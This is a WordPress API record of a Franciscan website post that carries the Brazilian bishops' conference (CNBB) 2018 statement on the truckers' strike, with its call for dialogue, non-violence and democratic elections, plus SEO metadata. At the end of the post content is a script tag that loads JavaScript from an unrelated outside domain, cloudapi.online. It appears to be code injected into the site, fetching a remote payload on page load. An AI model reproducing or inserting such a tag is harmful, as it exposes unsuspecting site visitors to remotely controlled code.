{"id":160926,"date":"2018-05-31T15:03:12","date_gmt":"2018-05-31T18:03:12","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=160926"},"modified":"2020-05-27T09:47:47","modified_gmt":"2020-05-27T12:47:47","slug":"a-crise-e-grave-e-pede-solucoes-justas","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/","title":{"rendered":"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d"},"content":{"rendered":"<p><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2018\/05\/nota_cnbb_310518.jpg\" alt=\"nota_cnbb_310518\" width=\"830\" height=\"500\" \/><\/p>\n<p>A Confer\u00eancia Nacional dos Bispos do Brasil (CNBB) se solidariza com os caminhoneiros, trabalhadores e trabalhadoras, em manifesta\u00e7\u00e3o em todo territ\u00f3rio nacional, em nota divulgada nesta quarta-feira, 30 de maio. Preocupada com as duras consequ\u00eancias que sempre recaem sobre os mais pobres, no texto a entidade conclama toda a sociedade para o di\u00e1logo e para a n\u00e3o viol\u00eancia. \u201cReconhecemos a import\u00e2ncia da profiss\u00e3o e da atividade dos caminhoneiros\u201d, pontua.<\/p>\n<p>Confira, abaixo, a nota na \u00edntegra:<\/p>\n<p style=\"text-align: center;\"><strong>NOTA DA CNBB SOBRE O MOMENTO NACIONAL<\/strong><br \/>\n<strong> \u201cJesus entrou e p\u00f4s-se no meio deles e disse: A paz esteja convosco\u201d(Jo 20,19)<\/strong><\/p>\n<p>A Confer\u00eancia Nacional dos Bispos do Brasil \u2013 CNBB, solid\u00e1ria com os caminhoneiros, trabalhadores e trabalhadoras, em manifesta\u00e7\u00f5es em todo territ\u00f3rio nacional, e preocupada com as duras consequ\u00eancias que sempre recaem sobre os mais pobres, conclama toda a sociedade para o di\u00e1logo e para a n\u00e3o viol\u00eancia. Reconhecemos a import\u00e2ncia da profiss\u00e3o e da atividade dos caminhoneiros.<\/p>\n<p>A crise \u00e9 grave e pede solu\u00e7\u00f5es justas. Contudo, \u201cqualquer solu\u00e7\u00e3o que atenda \u00e0 l\u00f3gica do mercado e aos interesses partid\u00e1rios antes que \u00e0s necessidades do povo, especialmente dos mais pobres, nega a \u00e9tica e se desvia do caminho da justi\u00e7a\u201d (CNBB, 10\/03\/2016). Nenhuma solu\u00e7\u00e3o que se utilize da viol\u00eancia ou prejudique a democracia pode ser admitida como sa\u00edda para a crise.<\/p>\n<p>N\u00e3o \u00e9 justo submeter o Estado ao mercado. Quando \u00e9 o mercado que governa, o Estado torna-se fraco e acaba submetido a uma perversa l\u00f3gica financista. \u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d (Papa Francisco, Evangelii Gaudium, 58).<\/p>\n<p>\u00c9 necess\u00e1rio cultivar o di\u00e1logo que exige humilde escuta rec\u00edproca e decidido respeito ao Estado democr\u00e1tico de direito, para o atendimento, na justa medida, das reivindica\u00e7\u00f5es.<\/p>\n<p>As elei\u00e7\u00f5es se aproximam. \u00c9 preciso assegurar que sejam realizadas de acordo com os princ\u00edpios democr\u00e1ticos e \u00e9ticos, para restabelecer nossa confian\u00e7a e nossa esperan\u00e7a. Propostas que desrespeitam a liberdade e o estado de direito n\u00e3o conduzem ao bem comum, mas \u00e0 viol\u00eancia.<\/p>\n<p>Celebramos a Solenidade do Corpus Christi, fonte de unidade e de paz. Quem participa da Eucaristia n\u00e3o pode deixar de ser art\u00edfice da unidade e da paz. O P\u00e3o da unidade nos cure da ambi\u00e7\u00e3o de prevalecer sobre os outros, da gan\u00e2ncia de entesourar para n\u00f3s mesmos, de fomentar disc\u00f3rdias e disseminar cr\u00edticas; que desperte a alegria de nos amarmos sem rivalidades, nem invejas, nem murmura\u00e7\u00f5es maldizentes (cf. Papa Francisco, Festa do Corpus Christi, 2017). O P\u00e3o da Vida nos motive a cultivar o perd\u00e3o, a desenvolver a capacidade de di\u00e1logo e nos anime a imitar Jesus Cristo, que veio para servir, n\u00e3o para ser servido.<\/p>\n<p>Conclamamos, por fim, todos \u00e0 ora\u00e7\u00e3o e ao compromisso na busca de um Brasil solid\u00e1rio, pac\u00edfico, justo e fraterno. A paz \u00e9 um dom de Deus, mas \u00e9 tamb\u00e9m fruto de nosso trabalho.<\/p>\n<p>Nossa Senhora Aparecida interceda por todos!<\/p>\n<p style=\"text-align: center;\"><strong>Cardeal Sergio da Rocha<\/strong><br \/>\nArcebispo de Bras\u00edlia (DF)<br \/>\nPresidente da CNBB<\/p>\n<p style=\"text-align: center;\"><strong>Dom Murilo S. R. Krieger, SCJ<\/strong><br \/>\nArcebispo de S\u00e3o Salvador (BA)<br \/>\nVice-Presidente da CNBB<\/p>\n<p style=\"text-align: center;\"><strong>Dom Leonardo Ulrich Steiner, OFM<\/strong><br \/>\nBispo Auxiliar de Bras\u00edlia (DF)<br \/>\nSecret\u00e1rio-Geral da CNBB<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Nota da CNBB<\/p>\n","protected":false},"author":1,"featured_media":184764,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[162,163],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d - Vida Crist\u00e3 - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d - Vida Crist\u00e3 - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Nota da CNBB\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/\" \/>\n<meta property=\"og:site_name\" content=\"Vida Crist\u00e3 - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-31T18:03:12+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-05-27T12:47:47+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/vidacrista\/wp-content\/uploads\/2018\/05\/nota_cnbb_310518-2.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"601\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/\",\"name\":\"Vida Crist\u00e3 - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/vidacrista\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/\",\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/\",\"name\":\"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d - Vida Crist\u00e3 - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#website\"},\"datePublished\":\"2018-05-31T18:03:12+00:00\",\"dateModified\":\"2020-05-27T12:47:47+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/vidacrista\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/vidacrista\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d - Vida Crist\u00e3 - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/","og_locale":"pt_BR","og_type":"article","og_title":"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d - Vida Crist\u00e3 - Franciscanos","og_description":"Nota da CNBB","og_url":"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/","og_site_name":"Vida Crist\u00e3 - Franciscanos","article_published_time":"2018-05-31T18:03:12+00:00","article_modified_time":"2020-05-27T12:47:47+00:00","og_image":[{"width":800,"height":601,"url":"https:\/\/franciscanos.org.br\/vidacrista\/wp-content\/uploads\/2018\/05\/nota_cnbb_310518-2.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#website","url":"https:\/\/franciscanos.org.br\/vidacrista\/","name":"Vida Crist\u00e3 - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/vidacrista\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/","url":"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/","name":"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d - Vida Crist\u00e3 - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/#website"},"datePublished":"2018-05-31T18:03:12+00:00","dateModified":"2020-05-27T12:47:47+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/vidacrista\/a-crise-e-grave-e-pede-solucoes-justas\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/vidacrista\/"},{"@type":"ListItem","position":2,"name":"\u201cO dinheiro \u00e9 para servir e n\u00e3o para governar\u201d"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/133632ca93cec555316a35f76ab4153b","name":"admin","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/vidacrista\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g","caption":"admin"},"url":"https:\/\/franciscanos.org.br\/vidacrista\/author\/admin\/"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/160926"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/comments?post=160926"}],"version-history":[{"count":1,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/160926\/revisions"}],"predecessor-version":[{"id":181765,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/posts\/160926\/revisions\/181765"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/media\/184764"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/media?parent=160926"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/categories?post=160926"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/vidacrista\/wp-json\/wp\/v2\/tags?post=160926"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}